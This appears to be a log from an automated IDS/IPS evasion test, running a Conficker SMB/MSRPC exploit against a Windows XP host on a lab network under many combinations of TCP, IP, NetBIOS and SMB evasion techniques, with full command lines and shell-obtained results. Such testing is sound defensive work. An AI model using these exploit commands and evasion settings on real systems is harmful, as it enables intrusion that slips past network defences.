  2662. Info: NetBIOS connection 10.62.90.115:18737 -> 10.35.1.207:445
  2663. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2664. Info: Sending MSRPC request with exploit
  2665. Info: Shell found, attack succeeded
  2666. Info: CommandShell::SendCommand() - Failed to send string
  2667. Info: Command shell connection reset.
  2668. Info: Shell closed
  2669. 0: Success.
  2670. ................
  2671. 4600 runs averaging 1.91 runs / second ; progress: 2404/43200.........
  2672. 4609 runs averaging 1.91 runs / second ; progress: 2409/43200.
  2673. 4610 runs averaging 1.91 runs / second ; progress: 2414/43200.2015-06-07 23:59:45 INFO
  2674. Success. (10.62.90.115):
  2675. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23455 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=FVDJtPsNgvo --evasion=[start,smb_openpipe]tcp_chaff,"1","chksum|nullflag|outofwindow|shorthdr","random_alpha" --evasion=[start,end]tcp_paws,"50%","6","alpharandomized" --verifydelay=1000 --payload=shell
  2676. Info: Using random seed FVDJtPsNgvo
  2677. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
  2678. The following evasions are applied from stage start to smb_openpipe:
  2679. - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
  2680. * Invalid TCP checksum.
  2681. * NULL TCP control flags.
  2682. * An out-of-window sequence number.
  2683. * TCP header shorter than 20 bytes
  2684. * Duplicate packet has random alpha bytes as payload
  2685.  
  2686. Info: NetBIOS connection 10.62.90.115:23455 -> 10.35.1.207:445
  2687. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2688. Info: Sending MSRPC request with exploit
  2689. Info: Shell found, attack succeeded
  2690. Info: Shell closed
  2691. 0: Success.
  2692. ......
  2693. 4618 runs averaging 1.91 runs / second ; progress: 2419/43200......
  2694. 4624 runs averaging 1.91 runs / second ; progress: 2424/432002015-06-07 23:59:54 INFO
  2695. Success. (10.62.90.110):
  2696. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62608 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jagl4e+Cocw --evasion=[netbios_connect,end]ipv4_frag,"48" --evasion=[start,msrpc_bind]ipv4_order,"rand" --evasion=[smb_openpipe,end]tcp_paws,"1","7","random_alpha" --verifydelay=1000 --payload=shell
  2697. Info: Using random seed jagl4e+Cocy
  2698. The following evasions are applied from stage start to msrpc_bind:
  2699. - IPv4 fragments are sent in a random order
  2700. The following evasions are applied from stage netbios_connect to end:
  2701. - IPv4 fragments with at most 48 bytes per fragment
  2702. The following evasions are applied from stage smb_openpipe to end:
  2703. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random alpha bytes as payload
  2704.  
  2705. Info: NetBIOS connection 10.62.90.110:62608 -> 10.35.1.207:445
  2706. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2707. Info: Sending MSRPC request with exploit
  2708. Info: Shell found, attack succeeded
  2709. Info: Shell closed
  2710. 0: Success.
  2711. ..........
  2712. 4635 runs averaging 1.91 runs / second ; progress: 2429/43200..........
  2713. 4645 runs averaging 1.91 runs / second ; progress: 2434/43200.Pid 32240 timed out - killed
  2714. 2015-06-08 00:00:04 INFO
  2715. Timed out (10.62.90.118):
  2716. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47969 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=tp+FrT9yypg --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1408" --evasion=[smb_connect,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  2717. Info: Using random seed tp+FrT9yypi
  2718. The following evasions are applied from stage smb_connect to end:
  2719. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  2720. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  2721. - IPv4 fragments with at most 1408 bytes per fragment
  2722.  
  2723. Info: NetBIOS connection 10.62.90.118:47969 -> 10.35.1.207:445
  2724. Terminated
  2725. ................
  2726. 4663 runs averaging 1.91 runs / second ; progress: 2439/43200..........
  2727. 4673 runs averaging 1.91 runs / second ; progress: 2444/43200.........
  2728. 4682 runs averaging 1.91 runs / second ; progress: 2449/43200...........Pid 32520 timed out - killed
  2729. 2015-06-08 00:00:24 INFO
  2730. Timed out (10.62.90.114):
  2731. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40937 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=2UySA8bJYfo --evasion=[netbios_connect,smb_openpipe]tcp_chaff,"75%","nullchksum|nullflag|shorthdr|longhdr","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2732. Info: Using random seed 2UySA8bJYfr
  2733. The following evasions are applied from stage netbios_connect to smb_openpipe:
  2734. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  2735. * NULL TCP checksum.
  2736. * NULL TCP control flags.
  2737. * TCP header shorter than 20 bytes
  2738. * TCP header longer than packet total size
  2739. * Duplicate packet has original payload with alphanumeric bytes randomized
  2740. The following evasions are applied from stage smb_opentree to end:
  2741. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2742.  
  2743. Info: NetBIOS connection 10.62.90.114:40937 -> 10.35.1.207:445
  2744. Terminated
  2745.  
  2746. 4694 runs averaging 1.91 runs / second ; progress: 2454/43200........................
  2747. 4718 runs averaging 1.92 runs / second ; progress: 2459/43200......2015-06-08 00:00:31 INFO
  2748. Success. (10.62.90.113):
  2749. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33922 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=ftL7lBQo1h0 --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","4","652","random" --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"4","3","2047","random" --evasion=[start,end]tcp_paws,"75%","268435453","random_alphanum" --verifydelay=1000 --payload=shell
  2750. Info: Using random seed ftL7lBQo1h1
  2751. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alphanumeric bytes as payload
  2752. The following evasions are applied from stage smb_connect to smb_opentree:
  2753. - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 652 random bytes.
  2754. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2755. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 2047 random bytes.
  2756.  
  2757. Info: NetBIOS connection 10.62.90.113:33922 -> 10.35.1.207:445
  2758. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2759. Info: Sending MSRPC request with exploit
  2760. Info: Shell found, attack succeeded
  2761. Info: Shell closed
  2762. 0: Success.
  2763. ...........
  2764. 4736 runs averaging 1.92 runs / second ; progress: 2464/43200........2015-06-08 00:00:37 INFO
  2765. Success. (10.62.90.110):
  2766. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15508 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=UyQ9/Q7tcpQ --evasion=[smb_opentree,msrpc_req]ipv4_opt,"2","inc","unmodified" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"219","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","72760242","alpharandomized" --verifydelay=1000 --payload=shell
  2767. Info: Using random seed UyQ9/Q7tcpR
  2768. The following evasions are applied from stage smb_connect to msrpc_req:
  2769. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72760242> and has original payload with alphabetic bytes randomized
  2770. The following evasions are applied from stage smb_opentree to msrpc_req:
  2771. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2772. The duplicate packet has identical payload
  2773. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2774. - 219 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  2775.  
  2776. Info: NetBIOS connection 10.62.90.110:15508 -> 10.35.1.207:445
  2777. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2778. Info: Sending MSRPC request with exploit
  2779. Info: Shell found, attack succeeded
  2780. Info: Shell closed
  2781. 0: Success.
  2782. ...
  2783. 4748 runs averaging 1.92 runs / second ; progress: 2469/43200...........
  2784. 4759 runs averaging 1.92 runs / second ; progress: 2474/432002015-06-08 00:00:45 INFO
  2785. Success. (10.62.90.115):
  2786. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19812 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=APidMQF+mvg --evasion=[msrpc_bind,msrpc_req]smb_chaff,"50%","write_flag","rand" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","159953442","shuffle" --verifydelay=1000 --payload=shell
  2787. Info: Using random seed APidMQF+mvg
  2788. The following evasions are applied from stage netbios_connect to msrpc_req:
  2789. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 159953442> and has shuffled original payload
  2790. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2791. - 50% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  2792.  
  2793. Info: NetBIOS connection 10.62.90.115:19812 -> 10.35.1.207:445
  2794. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2795. Info: Sending MSRPC request with exploit
  2796. Info: Shell found, attack succeeded
  2797. Info: Shell closed
  2798. 0: Success.
  2799. .Pid 487 timed out - killed
  2800. 2015-06-08 00:00:47 INFO
  2801. Timed out (10.62.90.112):
  2802. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49214 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=YuEkRjb1/QI --evasion=[msrpc_req,end]smb_fnameobf,"add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2803. Info: Using random seed YuEkRjb1/QJ
  2804. The following evasions are applied from stage smb_opentree to msrpc_req:
  2805. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2806. The following evasions are applied from stage msrpc_req to end:
  2807. - The SMB filename is obfuscated:
  2808. * A 0x00 and random alphanumeric characters are appended to the filename
  2809.  
  2810. Info: NetBIOS connection 10.62.90.112:49214 -> 10.35.1.207:445
  2811. Terminated
  2812. ......
  2813. 4768 runs averaging 1.92 runs / second ; progress: 2479/43200......................
  2814. 4790 runs averaging 1.93 runs / second ; progress: 2484/43200.......2015-06-08 00:00:57 INFO
  2815. Success. (10.62.90.119):
  2816. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33279 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=/95Xlpf3RsE --evasion=[smb_connect,msrpc_req]tcp_paws,"1","221380699","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"3","225560803","alphanumrandomized" --verifydelay=1000 --payload=shell
  2817. Info: Using random seed /95Xlpf3RsH
  2818. The following evasions are applied from stage smb_connect to msrpc_req:
  2819. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 221380699> and has original payload with alphanumeric bytes randomized
  2820. The following evasions are applied from stage smb_opentree to smb_openpipe:
  2821. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 225560803> and has original payload with alphanumeric bytes randomized
  2822.  
  2823. Info: NetBIOS connection 10.62.90.119:33279 -> 10.35.1.207:445
  2824. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2825. Info: Sending MSRPC request with exploit
  2826. Info: Shell found, attack succeeded
  2827. Info: Shell closed
  2828. 0: Success.
  2829. ......
  2830. 4804 runs averaging 1.93 runs / second ; progress: 2489/43200..2015-06-08 00:01:00 INFO
  2831. Success. (10.62.90.119):
  2832. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31556 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6iwHnnxwOcY --evasion=[smb_openpipe,end]netbios_chaff,"75%","empty_unspec|empty_keepalive|http_get|broken_length" --evasion=[msrpc_req,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
  2833. Info: Using random seed 6iwHnnxwOcb
  2834. The following evasions are applied from stage smb_openpipe to end:
  2835. - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  2836. The following evasions are applied from stage msrpc_req to end:
  2837. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
  2838.  
  2839. Info: NetBIOS connection 10.62.90.119:31556 -> 10.35.1.207:445
  2840. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2841. Info: Sending MSRPC request with exploit
  2842. Info: Shell found, attack succeeded
  2843. Info: Shell closed
  2844. 0: Success.
  2845. ......
  2846. 4813 runs averaging 1.93 runs / second ; progress: 2494/43200.........
  2847. 4822 runs averaging 1.93 runs / second ; progress: 2499/43200........
  2848. 4830 runs averaging 1.93 runs / second ; progress: 2505/43200..................
  2849. 4848 runs averaging 1.93 runs / second ; progress: 2510/43200.........2015-06-08 00:01:22 INFO
  2850. Success. (10.62.90.112):
  2851. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55302 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=NCio3MEwTEg --evasion=[smb_connect,msrpc_req]netbios_chaff,"21","empty_unspec|http_get|http_post|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","268435453","random" --verifydelay=1000 --payload=shell
  2852. Info: Using random seed NCio3MEwTEg
  2853. The following evasions are applied from stage smb_connect to msrpc_req:
  2854. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  2855. The following evasions are applied from stage msrpc_req to end:
  2856. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  2857.  
  2858. Info: NetBIOS connection 10.62.90.112:55302 -> 10.35.1.207:445
  2859. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2860. Info: Sending MSRPC request with exploit
  2861. Info: Shell found, attack succeeded
  2862. Info: CommandShell::SendCommand() - Failed to send string
  2863. Info: Command shell connection reset.
  2864. Info: Shell closed
  2865. 0: Success.
  2866. ......2015-06-08 00:01:24 INFO
  2867. Success. (10.62.90.113):
  2868. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26322 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=QWx1nZIe9+M --evasion=[smb_connect,end]tcp_paws,"75%","72312509","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_segvar,"8","65535" --verifydelay=1000 --payload=shell
  2869. Info: Using random seed QWx1nZIe9+N
  2870. The following evasions are applied from stage smb_connect to end:
  2871. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 72312509> and has original payload with alphabetic bytes randomized
  2872. The following evasions are applied from stage smb_connect to msrpc_req:
  2873. - TCP packets are segmented to contain between 8 and 65535 bytes of payload.
  2874.  
  2875. Info: NetBIOS connection 10.62.90.113:26322 -> 10.35.1.207:445
  2876. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2877. Info: Sending MSRPC request with exploit
  2878. Info: Shell found, attack succeeded
  2879. Info: Shell closed
  2880. 0: Success.
  2881. ...
  2882. 4868 runs averaging 1.94 runs / second ; progress: 2515/43200........................................
  2883. 4908 runs averaging 1.95 runs / second ; progress: 2520/43200.....
  2884. 4913 runs averaging 1.95 runs / second ; progress: 2525/43200...
  2885. 4916 runs averaging 1.94 runs / second ; progress: 2530/43200Pid 1602 timed out - killed
  2886. 2015-06-08 00:01:40 INFO
  2887. Timed out (10.62.90.111):
  2888. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34158 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=Od53aWgCGO8 --evasion=[smb_openpipe,end]smb_decoytrees,"4","1","3","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
  2889. Info: Using random seed Od53aWgCGO8
  2890. The following evasions are applied from stage smb_connect to end:
  2891. - Add a random alphaurgent data byte to every 8 TCP segment.
  2892. The following evasions are applied from stage smb_openpipe to end:
  2893. - Before normal SMB writes, 4 SMB trees are opened and 1 writes are performed to them. The write payload is 3 random alphanumeric bytes.
  2894.  
  2895. Info: NetBIOS connection 10.62.90.111:34158 -> 10.35.1.207:445
  2896. Terminated
  2897. ......
  2898. 4923 runs averaging 1.94 runs / second ; progress: 2535/43200................
  2899. 4939 runs averaging 1.94 runs / second ; progress: 2540/43200..................
  2900. 4957 runs averaging 1.95 runs / second ; progress: 2545/43200..........2015-06-08 00:01:57 INFO
  2901. Success. (10.62.90.115):
  2902. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56910 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=h1E0rUeQUeg --evasion=[msrpc_bind,end]smb_fnameobf,"change_case|add_paths" --evasion=[start,end]tcp_paws,"75%","6","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"21","268435455","shuffle" --verifydelay=1000 --payload=shell
  2903. Info: Using random seed h1E0rUeQUei
  2904. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alpha bytes as payload
  2905. The following evasions are applied from stage netbios_connect to msrpc_req:
  2906. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  2907. The following evasions are applied from stage msrpc_bind to end:
  2908. - The SMB filename is obfuscated:
  2909. * Random characters case is changed
  2910. * Dummy paths are added ( a/b -> a/c/../b )
  2911.  
  2912. Info: NetBIOS connection 10.62.90.115:56910 -> 10.35.1.207:445
  2913. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2914. Info: Sending MSRPC request with exploit
  2915. Info: Shell found, attack succeeded
  2916. Info: Shell closed
  2917. 0: Success.
  2918. ...........
  2919. 4979 runs averaging 1.95 runs / second ; progress: 2550/43200.................
  2920. 4996 runs averaging 1.96 runs / second ; progress: 2555/43200.........
  2921. 5005 runs averaging 1.96 runs / second ; progress: 2560/43200...............
  2922. 5020 runs averaging 1.96 runs / second ; progress: 2565/43200.......Pid 2406 timed out - killed
  2923. 2015-06-08 00:02:17 INFO
  2924. Timed out (10.62.90.117):
  2925. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40290 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=AhYHSBXWoXo --evasion=[start,msrpc_bind]tcp_paws,"8","54291791","shuffle30" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  2926. Info: Using random seed AhYHSBXWoXo
  2927. The following evasions are applied from stage start to msrpc_bind:
  2928. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 54291791> and has 30 bytes of original payload, then shuffled original payload
  2929. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2930. - Add a random urgent data byte to every 2 TCP segment.
  2931.  
  2932. Info: NetBIOS connection 10.62.90.117:40290 -> 10.35.1.207:445
  2933. Terminated
  2934. .........
  2935. 5037 runs averaging 1.96 runs / second ; progress: 2570/43200........
  2936. 5045 runs averaging 1.96 runs / second ; progress: 2575/43200......
  2937. 5051 runs averaging 1.96 runs / second ; progress: 2580/43200...............
  2938. 5066 runs averaging 1.96 runs / second ; progress: 2585/43200.............
  2939. 5079 runs averaging 1.96 runs / second ; progress: 2590/43200.....
  2940. 5084 runs averaging 1.96 runs / second ; progress: 2595/43200.....
  2941. 5089 runs averaging 1.96 runs / second ; progress: 2600/43200...............
  2942. 5104 runs averaging 1.96 runs / second ; progress: 2605/43200...........
  2943. 5115 runs averaging 1.96 runs / second ; progress: 2610/43200.............2015-06-08 00:03:05 INFO
  2944. Success. (10.62.90.115):
  2945. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59465 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=3DS3pyOHWq0 --evasion=[start,msrpc_bind]tcp_chaff,"21","chksum|shorthdr","shuffle" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
  2946. Info: Using random seed 3DS3pyOHWq3
  2947. The following evasions are applied from stage start to msrpc_bind:
  2948. - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
  2949. * Invalid TCP checksum.
  2950. * TCP header shorter than 20 bytes
  2951. * Duplicate packet has shuffled original payload
  2952. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2953. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
  2954.  
  2955. Info: NetBIOS connection 10.62.90.115:59465 -> 10.35.1.207:445
  2956. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2957. Info: Sending MSRPC request with exploit
  2958. Info: Shell found, attack succeeded
  2959. Info: Shell closed
  2960. 0: Success.
  2961.  
  2962. 5129 runs averaging 1.96 runs / second ; progress: 2615/43200.......
  2963. 5136 runs averaging 1.96 runs / second ; progress: 2620/43200...
  2964. 5139 runs averaging 1.96 runs / second ; progress: 2625/43200
  2965. 5139 runs averaging 1.95 runs / second ; progress: 2630/43200....
  2966. 5143 runs averaging 1.95 runs / second ; progress: 2635/43200......
  2967. 5149 runs averaging 1.95 runs / second ; progress: 2640/43200....
  2968. 5153 runs averaging 1.95 runs / second ; progress: 2645/43200.......
  2969. 5160 runs averaging 1.95 runs / second ; progress: 2650/43200......
  2970. 5166 runs averaging 1.95 runs / second ; progress: 2655/43200.....
  2971. 5171 runs averaging 1.94 runs / second ; progress: 2660/43200...2015-06-08 00:03:53 INFO
  2972. Success. (10.62.90.117):
  2973. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27679 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=QkY39pBKwKw --evasion=[netbios_connect,end]tcp_paws,"1","121655769","random" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"43643","65533" --verifydelay=1000 --payload=shell
  2974. Info: Using random seed QkY39pBKwKx
  2975. The following evasions are applied from stage netbios_connect to end:
  2976. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 121655769> and has random bytes as payload
  2977. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2978. - TCP packets are segmented to contain between 43643 and 65533 bytes of payload.
  2979.  
  2980. Info: NetBIOS connection 10.62.90.117:27679 -> 10.35.1.207:445
  2981. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2982. Info: Sending MSRPC request with exploit
  2983. Info: Shell found, attack succeeded
  2984. Info: Shell closed
  2985. 0: Success.
  2986. .........
  2987. 5184 runs averaging 1.94 runs / second ; progress: 2665/43200......
  2988. 5190 runs averaging 1.94 runs / second ; progress: 2670/43200.......
  2989. 5197 runs averaging 1.94 runs / second ; progress: 2675/43200..........
  2990. 5207 runs averaging 1.94 runs / second ; progress: 2680/43200.......
  2991. 5214 runs averaging 1.94 runs / second ; progress: 2686/43200...........
  2992. 5225 runs averaging 1.94 runs / second ; progress: 2691/43200.........
  2993. 5234 runs averaging 1.94 runs / second ; progress: 2696/43200..........2015-06-08 00:04:30 INFO
  2994. Success. (10.62.90.111):
  2995. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38914 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=lPX1ueb1MCY --evasion=[msrpc_bind,end]tcp_paws,"75%","8","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"65533","65534" --verifydelay=1000 --payload=shell
  2996. Info: Using random seed lPX1ueb1MCa
  2997. The following evasions are applied from stage smb_connect to msrpc_bind:
- TCP packets are segmented to contain between 65533 and 65534 bytes of payload.
The following evasions are applied from stage msrpc_bind to end:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload

Info: NetBIOS connection 10.62.90.111:38914 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.

5245 runs averaging 1.94 runs / second ; progress: 2701/43200.........Pid 4779 timed out - killed
2015-06-08 00:04:34 INFO
Timed out (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31057 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=66asV1b53WY --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"5","inc","zero" --evasion=[smb_connect,smb_openpipe]ipv4_opt,"2","inc","unmodified" --evasion=[netbios_connect,end]tcp_paws,"2","3","zero" --verifydelay=1000 --payload=shell
Info: Using random seed 66asV1b53Wb
The following evasions are applied from stage netbios_connect to msrpc_bind:
- Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has NULL bytes for payload
The following evasions are applied from stage netbios_connect to end:
- Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has 0x00 bytes as payload
The following evasions are applied from stage smb_connect to smb_openpipe:
- Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has identical payload

Info: NetBIOS connection 10.62.90.116:31057 -> 10.35.1.207:445
Terminated
.......
5262 runs averaging 1.94 runs / second ; progress: 2706/43200................
5278 runs averaging 1.95 runs / second ; progress: 2711/43200...........
5289 runs averaging 1.95 runs / second ; progress: 2716/43200......
5295 runs averaging 1.95 runs / second ; progress: 2721/43200............
5307 runs averaging 1.95 runs / second ; progress: 2726/43200.............
5320 runs averaging 1.95 runs / second ; progress: 2731/43200...................
5339 runs averaging 1.95 runs / second ; progress: 2736/43200...............
5354 runs averaging 1.95 runs / second ; progress: 2741/43200Pid 5432 timed out - killed
2015-06-08 00:05:11 INFO
Timed out (10.62.90.118):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38134 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IXFVjUV0NBU --evasion=[start,smb_opentree]tcp_chaff,"2","nullflag|outofwindow|longhdr","shuffle30" --evasion=[smb_openpipe,end]tcp_paws,"1","2","random_alpha" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
